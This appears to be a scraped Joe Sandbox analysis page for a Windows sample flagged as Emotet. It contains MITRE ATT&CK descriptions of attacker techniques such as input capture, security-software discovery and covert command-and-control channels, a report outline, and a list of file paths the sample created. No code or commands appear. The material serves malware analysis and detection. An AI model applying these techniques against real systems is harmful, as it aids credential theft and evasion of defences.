Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sample

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_99e4cc34952fe878588783efe1b659fd6a7d99c_7cac0383_160a9aca\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER922F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER96B4.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9907.tmp.xml

C:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml (copy)

C:\ProgramData\USOPrivate\UpdateStore\updatestoretemp51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml

C:\Windows\Logs\waasmedic\waasmedic.20220801_204255_503.etl

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

C:\Windows\SoftwareDistribution\DataStore\DataStore.edb

C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm

Windows Analysis Report
sample